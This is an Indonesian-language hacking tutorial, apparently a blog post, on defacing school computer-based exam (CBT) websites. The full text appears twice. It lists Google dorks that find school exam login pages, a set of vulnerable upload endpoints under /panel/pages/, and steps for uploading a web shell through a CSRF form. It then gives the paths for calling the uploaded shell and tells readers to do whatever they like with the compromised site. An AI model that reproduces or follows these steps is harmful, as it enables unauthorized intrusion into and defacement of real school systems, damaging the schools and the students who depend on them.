Deface POC CBT
Assalamualaikum Brother... :v
Kali Ini gw akan Ngasih Tutor, Gimana sih cara Deface CBT atau bisa dibilang Computer Based Test.. Nahh nih gw kasih sedikit tutor buat kalian semua....
yang pertama siapin Dork
Dork :
inurl:/login.php intitle:ujian online
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:cbt beesmart
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:ujian sma
inurl:/login.php intitle:cbt pintersmart
inurl:/login.php intitle:ujian pintersmart
Exploit :
/panel/pages/upload-file.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php
CSRF : Klik Disini
Pertama kita dorking dulu...
Pilih Salah satu Target Yak...
Nahhh.... Tinggal tambahin Exploit ke website nya :v
Kalo Blank putih, Berarti VULN
Langsung Copy aja URL ke CSRF tadi, Untuk Post File kita Pilih uploadfile , uploadfile2 , uploadfile3 (pilih salah satu aja )
kalo dah, Kunci Targetnya dan Pilih Shell kamu :v
Kalo ada tilisan succes dipojok atas, itu berarti Sukses upload shell
Cara Panggil Shell kek gini,
/images/namashell.php
/pictures/namashell.php
/video/namashell.php
(tambahin dibelakang path)
Nahh... Udahkan, terserah mau diapain...
oke Segini aja tutorialnya.. Kalo ada kesalahan, maaf. namanya juga manusia (banyak salah) :v
See You Next Time yaa Gaesss
Wassalamualaikum...
Kali Ini gw akan Ngasih Tutor, Gimana sih cara Deface CBT atau bisa dibilang Computer Based Test.. Nahh nih gw kasih sedikit tutor buat kalian semua....
yang pertama siapin Dork
Dork :
inurl:/login.php intitle:ujian online
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:cbt beesmart
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:ujian sma
inurl:/login.php intitle:cbt pintersmart
inurl:/login.php intitle:ujian pintersmart
Exploit :
/panel/pages/upload-file.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php
CSRF : Klik Disini
Pertama kita dorking dulu...
Pilih Salah satu Target Yak...
Nahhh.... Tinggal tambahin Exploit ke website nya :v
Kalo Blank putih, Berarti VULN
Langsung Copy aja URL ke CSRF tadi, Untuk Post File kita Pilih uploadfile , uploadfile2 , uploadfile3 (pilih salah satu aja )
kalo dah, Kunci Targetnya dan Pilih Shell kamu :v
Kalo ada tilisan succes dipojok atas, itu berarti Sukses upload shell
Cara Panggil Shell kek gini,
/images/namashell.php
/pictures/namashell.php
/video/namashell.php
(tambahin dibelakang path)
Nahh... Udahkan, terserah mau diapain...
oke Segini aja tutorialnya.. Kalo ada kesalahan, maaf. namanya juga manusia (banyak salah) :v
See You Next Time yaa Gaesss
Wassalamualaikum...
